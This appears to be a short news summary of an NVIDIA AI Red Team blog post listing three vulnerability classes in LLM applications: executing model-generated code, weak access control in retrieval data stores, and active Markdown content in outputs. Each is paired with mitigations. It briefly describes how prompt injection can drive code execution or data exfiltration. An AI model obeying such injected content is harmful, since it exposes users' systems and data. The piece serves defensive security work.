The NVIDIA AI Red Team (AIRT) has evaluated numerous AI-enabled systems, identifying vulnerabilities and security weaknesses. In a recent technical blog post, the AIRT shared key findings from these assessments, offering advice on how to mitigate significant risks in LLM-based applications. Common vulnerabilities identified by the NVIDIA AI Red Team include:

Executing LLM-generated code can lead to remote code execution: Using functions like `exec` or `eval` on LLM-generated output without sufficient isolation can allow attackers to manipulate the LLM into producing malicious code via prompt injection.

* Mitigation: Avoid using `exec`, `eval`, or similar constructs. Structure applications to parse LLM responses for intent and map them to a predefined set of safe functions. If dynamic code execution is necessary, use a secure, isolated sandbox environment.

Insecure access control in retrieval-augmented generation (RAG) data sources: Weaknesses in RAG implementations can lead to data leakage and indirect prompt injection.

* Mitigation: Ensure correct permission implementation on a per-user basis, review delegated authorization management, and limit broad write access to the RAG data store. Consider excluding external emails or enabling users to select document access levels.

Active content rendering of LLM outputs: Using Markdown or other active content can enable data exfiltration.

* Mitigation: Implement image content security policies, display entire links to users before connecting to external sites, sanitize LLM output to remove active content, or disable active content entirely within the user interface. The NVIDIA AI Red Team recommends addressing these vulnerabilities to secure LLM implementations against common and impactful threats. They also offer an online NVIDIA DLI training course, Exploring Adversarial Machine Learning, for those interested in better understanding the fundamentals of adversarial machine learning.